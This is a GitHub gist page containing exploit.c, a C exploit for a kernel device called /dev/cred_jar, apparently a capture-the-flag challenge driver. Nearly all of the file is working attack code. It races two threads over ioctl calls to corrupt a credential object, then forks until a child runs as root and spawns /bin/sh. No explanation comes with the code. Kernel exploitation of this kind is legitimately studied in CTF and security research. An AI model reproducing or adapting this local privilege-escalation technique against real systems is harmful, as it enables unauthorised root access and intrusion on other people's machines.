Navigation Menu

Skip to content

Instantly share code, notes, and snippets.

@elnx

elnx/exploit.c

Forked from syjcnss/exploit.c
Created October 30, 2018 01:53
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save elnx/ecf641034b14d7a94d23314020b15eb8 to your computer and use it in GitHub Desktop.
Save elnx/ecf641034b14d7a94d23314020b15eb8 to your computer and use it in GitHub Desktop.
Download ZIP
exploit for cred_jar
Raw
exploit.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <pthread.h>
#define ALLOC_CTX _IO('t', 1)
#define USE_CTX _IO('t', 2)
#define GET_ID _IO('t', 3)
#define SET_ID _IO('t', 4)
volatile int race_stop, race_start;
int bug_fd;
void *get(void *arg)
{
int fd, id;
while (!race_stop) {
fd = open("/dev/cred_jar", O_RDWR);
if (ioctl(fd, USE_CTX, 2) < 0)
goto fail;
usleep(1);
if (ioctl(fd, GET_ID, &id) < 0)
goto fail;
if (id != 2) {
race_stop = 1;
break;
}
fail:
close(fd);
}
printf("id %x\n", id);
bug_fd = fd;
return NULL;
}
void *put(void *arg)
{
int fd;
while (!race_stop) {
fd = open("/dev/cred_jar", O_RDWR);
ioctl(fd, ALLOC_CTX, 2ul << 32| 128);
close(fd);
}
return NULL;
}
int main(int argc, char **argv)
{
pthread_t t1, t2;
int id = 0, pid;
pthread_create(&t1, NULL, get, NULL);
pthread_create(&t2, NULL, put, NULL);
sleep(1);
pthread_join(t1, NULL);
pthread_join(t2, NULL);
sleep(1);
while (1) {
pid = fork();
if (pid == 0) {
sleep(4);
if (getuid() == 0) {
if (fork() == 0) {
seteuid(0);
system("/bin/sh");
} else {
exit(0);
}
}
pause();
}
ioctl(bug_fd, GET_ID, &id);
printf("uid %x\n", id);
if (id == getuid()) {
ioctl(bug_fd, SET_ID, 0);
break;
}
else if (id >= 0) {
sleep(2);
}
}
pause();
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment